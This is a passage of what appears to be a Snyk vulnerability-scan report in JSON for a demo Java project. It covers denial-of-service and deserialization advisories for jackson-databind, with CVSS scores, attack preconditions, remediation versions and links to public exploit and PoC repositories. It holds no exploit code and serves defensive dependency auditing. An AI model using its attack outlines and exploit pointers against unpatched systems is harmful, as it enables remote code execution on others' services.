Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020)\n- [Documentation](https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html#UNWRAP_SINGLE_VALUE_ARRAYS)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3590)\n", + "epssDetails": { + "percentile": "0.65501", + "probability": "0.00252", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-42003" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": 
"com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-10-02T09:41:44.046865Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-02T09:22:10Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-10-02T09:54:05Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.258948Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.12.7.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Liao Xinxi" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.1)", + "[2.7.0,2.7.9.1)", + "[2.8.0,2.8.9)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.1", + "2.7.9.1", + "2.8.9" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.9)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": 
"com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/JavanXD/Demo-Exploit-Jackson-RCE", + "title": "Exploit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1599", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1462702", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:28.679692Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:49.385289Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.167922Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:28.679692Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.385289Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization 
of Untrusted Data. An attacker may exploit this issue by sending a maliciously crafted input to the `readValue` method of the `ObjectMapper`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.9 or higher.\n## References\n- [Exploit](https://github.com/JavanXD/Demo-Exploit-Jackson-RCE)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1599)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1462702)\n", + "epssDetails": { + "percentile": "0.97700", + "probability": "0.57112", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-7525" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-qxxx-2pp7-5hmx" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2017-09-14T14:43:48.569000Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.9)" + ], + "functionId": { + 
"className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-04-10T21:00:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2017-09-14T14:43:48Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.385289Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31573", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Liao Xinxi" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.1)", + "[2.7.0,2.7.9.1)", + "[2.8.0,2.8.10)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.6.7.1", + "2.7.9.1", + "2.8.10" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + 
"url": "https://github.com/FasterXML/jackson-databind/commit/e8f043d1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1680", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1737", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1506612", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:53.619980Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:46.857906Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:13.013603Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:53.619980Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:46.857906Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for 
[CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. 
These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e8f043d1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1680)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1737)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1506612)\n", + "epssDetails": { + "percentile": "0.92802", + "probability": "0.04801", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-15095" + ], + "CWE": [ + "CWE-184" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2017-11-07T13:13:32.343000Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-06-26T21:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + 
"level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2017-11-09T03:13:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:46.857906Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Imre Rad" + ], + "semver": { + "vulnerable": [ + "[,2.8.11)", + "[2.9.0,2.9.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.8.11", + "2.9.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1855", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/irsl/jackson-rce-via-spel/", + "title": "PoC Project" + } + ], + 
"cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:06.545272Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:58.597489Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.686860Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:06.545272Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:58.597489Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1855)\n- [PoC Project](https://github.com/irsl/jackson-rce-via-spel/)\n", + "epssDetails": { + "percentile": "0.95701", + "probability": "0.13977", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-17485" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-01-11T11:41:28.547000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-01-10T11:41:28Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + 
"publicationTime": "2018-01-22T12:30:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:58.597489Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.8.11" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32044", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Rui Chong" + ], + "semver": { + "vulnerable": [ + "[,2.8.11)", + "[2.9.0,2.9.4)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.8.11", + "2.9.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1899", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:48.440088Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + 
"modificationTime": "2024-03-11T09:53:59.857985Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:07.715996Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:48.440088Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:59.857985Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) and [CVE-2017-17485](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043)). This is exploitable via two different gadgets that bypass a blacklist.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1899)\n", + "epssDetails": { + "percentile": "0.94704", + "probability": "0.09270", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-5968" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-w3f4-3q6j-rh82" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-01-22T15:40:18.105000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "className": 